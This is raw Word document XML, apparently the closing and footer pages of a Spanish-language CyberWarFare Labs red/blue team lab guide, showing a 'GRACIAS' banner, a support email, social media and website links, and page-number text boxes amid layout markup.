                                  <w:color w:val="FFFFFF"/>
                                  <w:spacing w:val="-2"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>GRACIAS</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="3375DA83" id="Group 583" o:spid="_x0000_s1300" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:94pt;z-index:15854592;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="12192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">
                <v:shape id="Graphic 584" o:spid="_x0000_s1301" style="position:absolute;width:121920;height:11938;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="121920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" path="m12192000,l,,,1193291r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 585" o:spid="_x0000_s1302" type="#_x0000_t202" style="position:absolute;width:121920;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3A88B835" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="422"/>
                          <w:ind w:left="11"/>
                          <w:jc w:val="center"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:spacing w:val="-2"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>GRACIAS</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1FDA81" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="670E67BE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="568"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EAEDEE8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:left="6880" w:hanging="3817"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">En caso de cualquier dificultad o consulta, no dude en enviarnos un correo a </w:t>
      </w:r>
      <w:hyperlink r:id="rId293">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>support@cyberwarfare.live</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05AA3FEE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1263"/>
        </w:tabs>
        <w:spacing w:before="666" w:line="679" w:lineRule="exact"/>
        <w:ind w:left="1263" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Síguenos en :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F63322C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1983"/>
        </w:tabs>
        <w:spacing w:line="576" w:lineRule="exact"/>
        <w:ind w:left="1983" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">LinkedIn: </w:t>
      </w:r>
      <w:hyperlink r:id="rId294">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>https://www.linkedin.com/company/cyberwarfare/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B88C256" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1983"/>
        </w:tabs>
        <w:spacing w:line="581" w:lineRule="exact"/>
        <w:ind w:left="1983" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Twitter: https://twitter.com/cyberwarfarelab </w:t>
      </w:r>
      <w:hyperlink r:id="rId295"/>
    </w:p>
    <w:p w14:paraId="58943CED" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="649"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49F22837" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1264"/>
        </w:tabs>
        <w:spacing w:line="679" w:lineRule="exact"/>
        <w:ind w:hanging="451"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Para obtener más información, visite:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FD90D5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1983"/>
        </w:tabs>
        <w:spacing w:line="576" w:lineRule="exact"/>
        <w:ind w:left="1983" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Equipo Rojo / Azul Laboratorio : </w:t>
      </w:r>
      <w:hyperlink r:id="rId296">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>https://cyberwarfare.live</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3FAA26D4" w14:textId="69F0417A" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1983"/>
        </w:tabs>
        <w:spacing w:line="581" w:lineRule="exact"/>
        <w:ind w:left="1983" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Blog del Equipo Rojo/Azul: </w:t>
      </w:r>
      <w:hyperlink r:id="rId297">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>https://blog.cyberwarfare.live</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
      <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
      <w:pgMar w:top="0" w:right="0" w:bottom="580" w:left="0" w:header="0"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D66E" w14:textId="77777777" w:rsidR="00973595" w:rsidRDefault="00973595">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="71BD9231" w14:textId="77777777" w:rsidR="00973595" w:rsidRDefault="0097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850D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
    <w:pPr>
      <w:pStyle w:val="Textoindependiente"/>
      <w:spacing w:line="14" w:lineRule="auto"/>
      <w:rPr>
        <w:sz w:val="14"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:sz w:val="14"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="485314560" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="231E98D2" wp14:editId="67D96D47">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>5093970</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6464909</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="2002789"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65A1D1A0"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231E98D2" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Textbox 1" o:spid="_x0000_s1303" type="#_x0000_t202" style="position:absolute;margin-left:401.1pt;margin-top:509.05pt;width:157.7pt;height:14pt;z-index:-180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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="65A1D1A0"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14"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="485315072" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B423774" wp14:editId="56561DE1">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>11094211</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6464909</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="21907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2599E33A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                          <w:pPr>
                            <w:spacing w:line="264" w:lineRule="exact"/>
                            <w:ind w:left="2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0</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1B423774" id="Textbox 2" o:spid="_x0000_s1304" type="#_x0000_t202" style="position:absolute;margin-left:873.55pt;margin-top:509.05pt;width:17.25pt;height:14pt;z-index:-180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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="2599E33A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                    <w:pPr>
                      <w:spacing w:line="264" w:lineRule="exact"/>
                      <w:ind w:left="2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0</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="888888"/>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941C"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1216" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="76E7495F" wp14:editId="21F6B31B">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>5093970</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6464909</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="2002789" cy="17780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2799C24D"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76E7495F" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Textbox 120" o:spid="_x0000_s1316" type="#_x0000_t202" style="position:absolute;margin-left:401.1pt;margin-top:509.05pt;width:157.7pt;height:14pt;z-index:-179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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="2799C24D"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21728" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1041D460" wp14:editId="487D17E1">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>11068811</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6464909</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="244475" cy="17780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69296333"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50</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1041D460" id="Textbox 121" o:spid="_x0000_s1317" type="#_x0000_t202" style="position:absolute;margin-left:871.55pt;margin-top:509.05pt;width:19.25pt;height:14pt;z-index:-179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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="69296333"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50</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="888888"/>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E541" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
    <w:pPr>
      <w:pStyle w:val="Textoindependien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27C5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
    <w:pPr>
      <w:pStyle w:val="Textoindependien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8DCC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
    <w:pPr>
      <w:pStyle w:val="Textoindependiente"/>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5F28" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">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2AB0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
    <w:pPr>
      <w:pStyle w:val="Textoindependien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0973" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">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AFB9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
    <w:pPr>
      <w:pStyle w:val="Textoindependiente"/>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68FC"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2240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0209E4A4" wp14:editId="50950925">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>5093970</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6464909</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="2002789" cy="17780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7EE0E33D"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0209E4A4" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Textbox 237" o:spid="_x0000_s1318" type="#_x0000_t202" style="position:absolute;margin-left:401.1pt;margin-top:509.05pt;width:157.7pt;height:14pt;z-index:-179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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="7EE0E33D"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22752" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="008CB8AC" wp14:editId="31955C00">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>11068811</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6464909</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="244475" cy="17780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3FC6839A"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62</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008CB8AC" id="Textbox 238" o:spid="_x0000_s1319" type="#_x0000_t202" style="position:absolute;margin-left:871.55pt;margin-top:509.05pt;width:19.25pt;height:14pt;z-index:-179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mmAEAACIDAAAOAAAAZHJzL2Uyb0RvYy54bWysUs1uGyEQvlfKOyDuMWvLjaO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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="3FC6839A"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62</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="888888"/>
                        <w:spacing w:val="-5"/>
                        <w:sz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20A7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">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1BA5"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15584" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="40C5182E" wp14:editId="643D7593">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>840739</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6274409</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1630045" cy="3302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330200"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="1FEF871A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                          <w:pPr>
                            <w:pStyle w:val="Textoindependiente"/>
                            <w:spacing w:line="509" w:lineRule="exact"/>
                            <w:ind w:left="20"/>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:spacing w:val="-2"/>
                            </w:rPr>
                            <w:t>organización.</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shapetype w14:anchorId="40C5182E" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Textbox 25" o:spid="_x0000_s1305" type="#_x0000_t202" style="position:absolute;margin-left:66.2pt;margin-top:494.05pt;width:128.35pt;height:26pt;z-index:-180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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="1FEF871A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                    <w:pPr>
                      <w:pStyle w:val="Textoindependiente"/>
                      <w:spacing w:line="509" w:lineRule="exact"/>
                      <w:ind w:left="20"/>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-2"/>
                      </w:rPr>
                      <w:t>organización.</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap anchorx="page" anchory="page"/>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:sz w:val="20"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="485316096" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="24D47294" wp14:editId="053C5A02">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>11094211</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6464909</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="180975" cy="1778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099A6560" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                          <w:pPr>
                            <w:spacing w:line="264" w:lineRule="exact"/>
                            <w:ind w:left="20"/>
                            <w:rPr>
                              <w:sz w:val="24"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:color w:val="888888"/>
                              <w:spacing w:val="-5"/>
                              <w:sz w:val="24"/>
                            </w:rPr>
                            <w:t>11</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shape w14:anchorId="24D47294" id="Textbox 26" o:spid="_x0000_s1306" type="#_x0000_t202" style="position:absolute;margin-left:873.55pt;margin-top:509.05pt;width:14.25pt;height:14pt;z-index:-180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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="099A6560" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                    <w:pPr>
                      <w:spacing w:line="264" w:lineRule="exact"/>
                      <w:ind w:left="20"/>
                      <w:rPr>
                        <w:sz w:val="24"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="888888"/>
                        <w:spacing w:val="-5"/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                      <w:t>11</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap anchorx="page" anchory="page"/>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:sz w:val="20"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="485316608" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7755A1B7" wp14:editId="2B29E304">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>5093970</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6569761</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="2002789" cy="1778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5BBD50D5"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 w14:anchorId="7755A1B7" id="Textbox 27" o:spid="_x0000_s1307" type="#_x0000_t202" style="position:absolute;margin-left:401.1pt;margin-top:517.3pt;width:157.7pt;height:14pt;z-index:-179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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="5BBD50D5"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2209" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
    <w:pPr>
      <w:pStyle w:val="Textoindependien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BB59" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
    <w:pPr>
      <w:pStyle w:val="Textoindependiente"/>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01A9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
    <w:pPr>
      <w:pStyle w:val="Textoindependiente"/>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EFB4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
    <w:pPr>
      <w:pStyle w:val="Textoindependiente"/>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5439" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
    <w:pPr>
      <w:pStyle w:val="Textoindependiente"/>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00C2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
    <w:pPr>
      <w:pStyle w:val="Textoindependiente"/>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00FE"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3264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49F74AB6" wp14:editId="2EF9FDE0">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>5093970</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6647256</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="2003425" cy="178435"/>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3425" cy="178435"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p w14:paraId="27AFAA96" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                          <w:pPr>
                            <w:spacing w:line="265"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49F74AB6" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Textbox 290" o:spid="_x0000_s1320" type="#_x0000_t202" style="position:absolute;margin-left:401.1pt;margin-top:523.4pt;width:157.75pt;height:14.05pt;z-index:-179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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="27AFAA96" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                    <w:pPr>
                      <w:spacing w:line="265"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6C5B"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3776" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="478D3CC3" wp14:editId="1060DC22">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>5093970</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6464909</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="2002789" cy="17780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61BF101D"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478D3CC3" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Textbox 302" o:spid="_x0000_s1321" type="#_x0000_t202" style="position:absolute;margin-left:401.1pt;margin-top:509.05pt;width:157.7pt;height:14pt;z-index:-179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" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w14:paraId="61BF101D"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24288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6EE9CF47" wp14:editId="1AC1C936">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>11068811</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>6464909</wp:posOffset>
              </wp:positionV>
